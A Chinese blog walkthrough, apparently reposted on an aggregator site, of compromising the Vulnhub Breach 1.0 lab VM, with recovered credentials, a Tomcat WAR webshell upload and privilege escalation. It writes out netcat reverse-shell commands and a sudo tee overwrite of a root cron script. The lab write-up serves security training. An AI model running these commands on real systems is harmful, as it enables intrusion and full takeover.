IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> Vulnhub之Breach1.0靶场练习 -> 正文阅读

[网络协议]Vulnhub之Breach1.0靶场练习

靶机信息

下载链接:
https://download.vulnhub.com/breach/Breach-1.0.zip

环境配置

1.解压后用vmware打开,这里是我已经安装好的,未安装的只有ova和readme.txt两个文件
Pasted image 20220221090234.png

2.靶机默认使用仅主机模式,ip为192.168.110.140,所以需要将vmnet1的ip设置在192.168.110.0此网段。
Pasted image 20220221090526.png

Pasted image 20220221090548.png
Pasted image 20220221090629.png

3.使用本机ping靶机ip
Pasted image 20220221090743.png

可以看到成功ping通

4.配置kali,将kali配置为仅主机模式,然后修改kali中的ip为静态ip和靶机在同一网段。
Pasted image 20220221091157.png

使用管理员账户使用vim /etc/network/interfaces命令进入
Pasted image 20220221091325.png

Pasted image 20220221091420.png

将前面的#给去掉就是需要修改的东西,然后保存退出
Pasted image 20220221091532.png

重启网络使用systemctl restart working 或者 service working restart就可以发现可以成功ping通
Pasted image 20220221092049.png
接下来开始靶机练习

靶机练习

信息收集

使用nmap扫描靶机开放的端口
通过扫描结果可以看到基本全部段都开放了,可能靶场做了某种防护措施,接下来先访问80端口。
Pasted image 20220221095324.png

web渗透

1.通过浏览web界面并没有发现什么有用的信息,查看以下源代码
Pasted image 20220221095539.png

发现存在一串密钥,进行解密

2.经过多次解密得到pgibbons:damnitfeelta
Pasted image 20220221095840.png

3.再次查看源代码发现该图片有一个跳转链接
Pasted image 20220221100005.png

可以看到已经跳转到了另外一个界面
Pasted image 20220221100027.png
4.通过测试几个按钮除了最后一个其余都为图片链接,最后一个按钮又跳转到了另外一个界面
Pasted image 20220221100200.png
发现其为cms界面

5.尝试弱口令后无果,突然想起来前面解密出来的东西很像账号密码,进行登录,账号:pgibbons 密码:damnitfeelta
Pasted image 20220221100641.png
发现成功登录,然后其有一个地方很是显眼,貌似是邮件,点进去查看
Pasted image 20220221100736.png
6.通过查看邮件并翻译发现最后一封邮件说存在一个keystore的文件(keystore是存储公私密钥的一种文件格式)

Pasted image 20220221100938.png
通过浏览该地址确实存在文件,进行下载
Pasted image 20220221101030.png
7.通过浏览该界面在菜单里面发现了有一个提示
Pasted image 20220221102146.png
点击去发现存在一个下载pacp的链接
Pasted image 20220221102312.png
进行下载

8.直接打开发现都是经过加密的内容,接下来查看以下keystore这个密钥里面所有的证书
keytool -list -keystore keystore(这里需要输入口令在上面可以看到口令为tomcat)
Pasted image 20220221103508.png
导出证书
keytool -importkeystore -srckeystore keystore -destkeystore tomcatkeystore.p12 -deststoretype pkcs12 -srcalias tomcat
Pasted image 20220221104045.png

9.将p12证书导入到wireshark
将流量包打开,在编辑中找到首选项-Protocols-SSL,在这里wireshark已经将SSL改为了TLS,将文件导入
Pasted image 20220221140033.png
我这里直接筛选出了http的包发现靶机通过http访问了https://192.168.110.140:8443/_M@nag3Me/html打开后是一个tomcat管理登录界面
Pasted image 20220221141325.png

10.继续观察数据包发现该tomcat是通过basic进行认证,在wireshark中自动解密tomcat:Tt\5D8F(#!*u=G)4m7zB
Pasted image 20220221141625.png
成功登录
Pasted image 20220221141843.png
在下面也有攻击者上传的马但是无法直接打卡所以进行重新上传

获取shell权限

1.上传木马

Pasted image 20220221143122.png

这里使用jsp木马,再将木马压缩为zip文件,修改后缀为war文件在进行上传
Pasted image 20220221143144.png
这里使用冰蝎马
Pasted image 20220221153439.png
这里查看以下用户特别注意以下这两个用户milton和blumbergh
注:这里需要一直上传木马才可以,可能该系统存在杀软或者webshell查杀工具,这里建议使用最新版本冰蝎,不然可能反弹shell失败

2.反弹shell

因为一直删除木马所以考虑反弹shell
这里我使用反弹shell命令为:nc -e /bin/sh 192.168.110.128 4444 这里的ip为你需要反弹到哪里的ip 我使用的是kali的ip 4444为监听的端口号
Pasted image 20220221153757.png
Pasted image 20220221153913.png
这里可以看到成功反弹并可以执行命令
注:后面我我又重新反弹了shell 因为nc反弹的不可以使用su命令

3.查看数据库

因为一直掉线所以我在这里查看了一下需要注意的两个文件
Pasted image 20220221154301.png
Pasted image 20220221154329.png
通过查看文件发现该数据库的用户为root密码为空
进行连接
Pasted image 20220221154831.png

可以查看到返回的账户和密码对密码进行破解,密码为:thelaststraw
Pasted image 20220221154956.png

4.登录用户milton

这里发现无法执行su命令
Pasted image 20220221161112.png
这里使用python进行解决
python -c ‘import pty;pty.spawn("/bin/bash")’
Pasted image 20220221161230.png
查看milton用户home目录的文件,没有发现可以利用的信息
Pasted image 20220221161725.png
查看内核版本也不存在漏洞
Pasted image 20220221161753.png
查看一下系统命令
Pasted image 20220221161859.png

到现在发现了7张图片6张在图片目录下http://192.168.110.140/images/,1张在milyon用户下
Pasted image 20220221162043.png
将图片复制到kali里面使用strings打印各图片其中可打印的字符,追加输出到images.txt,在vim下查看,密码在bill.png图片中
Pasted image 20220221162622.png
查看images.txt找一下可能存在的密码或提示
Pasted image 20220221162802.png
发现唯一的单词是coffeestains怀疑是密码

5.登录blumbergh用户

用户:blumbergh 密码:coffeestains
Pasted image 20220221163030.png
查看历史命令
Pasted image 20220221163212.png
发现该用户查看了tidyup.sh脚本文件打开分析
Pasted image 20220221163325.png
这是一段清理脚本,描述中说明每3分钟执行清理,删除webapps目录下的文件,因此之前上传的菜刀马总是被删除,需要重新上传。
查看tidyup.sh的权限,对该脚本没有写入权限,只有root可以

执行sudo -l 查看权限
Pasted image 20220221163432.png
发现用户能够以root权限执行这tee程序或tidyup.sh脚本:/usr/bin/tee和/usr/share/cleanup/tidyup.sh
tee命令用于读取标准输入的数据,并将其内容输出成文件。tidyup.sh是清理脚本。

6.反弹root权限并获取flag

向tidyup.sh中写入反弹shell命令
tidyup.sh文件只有root可写,而能够以root权限运行tee命令,那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令:
echo “nc -e /bin/bash 192.168.110.128 5555” > shell.txt
再使用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看tidyup.sh文件写入成功:
cat /usr/share/cleanup/tidyup.sh
Pasted image 20220221165943.png
等待反弹shell
Pasted image 20220221170011.png
因为我这里上传的不是大马,所以我想了半天把该图片直接复制到了images目录下面可以直接打开查看flag
Pasted image 20220221170646.png
Pasted image 20220221170655.png

总结

这个靶场我也是遇到了很多的坑,从wireshark抓包分析到上传木马再到反弹shell出现了很多的问题,但是出现了问题那么肯定要解决问题,经过不懈的努力终于还是拿下了,一定要有耐心,也要有信心。

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章           查看所有文章
加:2022-02-26 12:07:35  更:2022-02-26 12:11:33 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年10日历 -2024/10/5 13:31:07-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码